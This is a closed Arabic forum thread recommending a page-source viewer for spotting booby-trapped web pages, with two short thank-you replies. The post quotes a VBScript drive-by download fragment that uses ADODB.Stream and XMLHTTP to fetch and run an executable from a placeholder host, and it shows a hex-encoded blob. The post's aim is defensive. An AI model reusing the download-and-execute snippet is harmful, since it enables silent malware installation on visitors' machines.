حالة الموضوع:
مغلق
  1. mouadh kouki

    mouadh kouki Developer

    الأنتساب:
    ‏8 نوفمبر 2011
    المشاركات:
    43
    الإعجابات المتلقاة:
    0
    نقاط الجائزة:
    6
    الإقامة:
    TuNiSiA
    [​IMG]
    اسم البرنامج : ip tools
    تحميل البرنامج :من هنا
    فكرة البرنامج

    البرنامج جميل جدا يطلعلك كود الصفحة لنفرض ان شخص يريد ان يخترقك يرسل لك رابط صفحة ملغومة او قد تشك فى انها ملغومة ماذا نفعل
    ناخذ الرابط ونضعه فى خانة URL
    ونظغط start راح يطلعلك كود الصفحة خلال ثوانى فقط

    [​IMG]
    اذا وجدت فى الصفحة كود مثل هذا

    هذا كود من صفحة ملغمة استخدمها فى الاختراق

    ' due to how ajax works, the file MUST be within the same local domain
    dl = "http://xxx.xxx/xxx.exe"
    ' create adodbstream object
    Set df = document.createElement("object")
    df.setAttribute "classid", "clsid:BD96C556-65A3-11D0-983A-00C04FC29E36"
    str="Microsoft.XMLHTTP"
    Set x = df.CreateObject(str,"")


    وهو جزء من كود لفتح ملف تنفيدى تلقائي فى الجهاز عند الدخول الى الموقع
    مايهمنا فى الكود هو
    http://xxx.xxx/xxx.exe
    .exe
    يعني ملف تنفيدى
    وامتداد scr ايضا يكون مثله
    والهكر بيحط بدل منوا رابط الباتش ( السيرفر ) لكي يفتح باتش فى جهازك عند دخول الصفحة


    طيب هذه بعض الطرق والحيل هناك بعض الطرق الاخرى وهى ان يقوم الهكر بتحويل الباتش الى صفحة html يعني ما راح يطلع معنا كود .exe زى الى شفناه فوق ولكن هذه طريقة غبيه وكشفها سهل جدا اسهل ما تتصورون
    عندما يحول الهكر الباتش الى صفحة html يتحول اكود الصفحة لكود مثل هذا
    الكود

    F44454641554C545F434841525345540A466F6E742E436F6C
    6F72070C636C57696E646F77546578740B466F6E742E48656
    967687402F609466F6E742E4E616D65060D4D532053616E73
    2053657269660A466F6E742E5374796C650B000E4F6C64437
    2656174654F726465720908506F736974696F6E070E706F53
    637265656E43656E746572084F6E437265617465070A466F7
    26D4372656174650D506978656C73506572496E636802600A
    54657874486569676874020D0006544C6162656C064C61626
    56C31044C656674020A03546F700231055769647468023106
    486569676874020D0743617074696F6E060953697465204E6
    16D65000006544C6162656C064C6162656C32044C65667402
    0A03546F700203055769647468023206486569676874020D0

    [​IMG]

    ارجو اخذ الموضوع بعين الاعتبار فلقد اصبحت طريقة الاختراق بصفحات الملغمة سهلة


    [​IMG]
    [​IMG]

     
  2. MR.BLAMS

    MR.BLAMS Developer

    الأنتساب:
    ‏17 سبتمبر 2011
    المشاركات:
    21
    الإعجابات المتلقاة:
    0
    نقاط الجائزة:
    1
    الإقامة:
    Qatar
    رد: منع اى هكر من اختراق جهازك عن طريق الصفحات الملغمة

    بارك الله فيك يابطل ^:"​
     
  3. sahdy18

    sahdy18 Developer

    الأنتساب:
    ‏14 نوفمبر 2011
    المشاركات:
    29
    الإعجابات المتلقاة:
    0
    نقاط الجائزة:
    1
    الوظيفة:
    طالب
    رد: منع اى هكر من اختراق جهازك عن طريق الصفحات الملغمة

    بارك الله فيك
     
حالة الموضوع:
مغلق

مشاركة هذه الصفحة